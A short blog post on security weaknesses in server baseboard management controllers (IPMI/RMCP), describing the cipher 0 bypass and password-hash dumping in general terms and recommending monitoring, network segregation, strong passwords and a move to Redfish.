contact
We'll never share your data with anyone else.
Something went wrong. Please check your input or come back later.
Thank you

Bare Metal Monitoring Fails via IPMI, RMCP, BMC

BMC Server-Management
BMC
Deutsch

Mario Duhanic,

BMCs are those little mini-computers in your bare-metal servers. You know, the things with the LEDs in the big cabinets that generate heat and noise. But I love them :)

Without getting much too technical here, IPMI is the name of the interface specification and RMCP is the underlying protocol (for LAN transmission it runs on UDP, TCP’s connectionless sister protocol).

Since these little “BMC computers” are tightly interwoven with the rest of the server’s components and have their own network interfaces, they are of course a good target for attacks of all kinds.

In the past, among others, two types of attacks from the network were very popular: cipher 0 and dumping the hashes.

Intelligent Platform Management Interface. Predatorix / commons.wikimedia.org
Intelligent Platform Management Interface. Predatorix / commons.wikimedia.org

Cipher 0

Cipher 0 (as in “zero”) made it possible to make changes to the system without a correct password and ultimately log in with elevated privileges. And this for the usual manufacturers HP (iLO), Dell (iDRAC) and Supermicro, who have since fixed this with patches.

Hashes on the Net

Another attack is to read the password hashes of IPMI users. When I try this on test servers using the usual pentest frameworks or just ipmitool, I get partial hits. Does the management software find this suspicious? Well, at least HP doesn’t, there are only IPMI/RMCP login/logoff events when scanning with severity “informational”. So if SNMB traps are configured, none is generated here.

“What now?” spoke Zeus

  • IPMI events should be monitored in general with reasonable rules, mostly this is only possible externally on a monitoring/logging server. As usual, the network segment on which the BMCs are attached to (iLO, iDRAC, etc.) should be separated from other traffic, either physically or via VLANs.
  • Of course, all the other usual precautions should also be taken, such as strong passwords and, if possible, no default usernames.
  • Redfish (not to be confused with reedfish) is a specification for remotely maintaining servers via a stateless and encrypted software interface (REST via https). Redfish was first released in August 2015.Among the main goals of Redfish is to replace the IPMI-over-LAN protocol in the medium term.

Further reading

Dan Farmer has written some useful articles: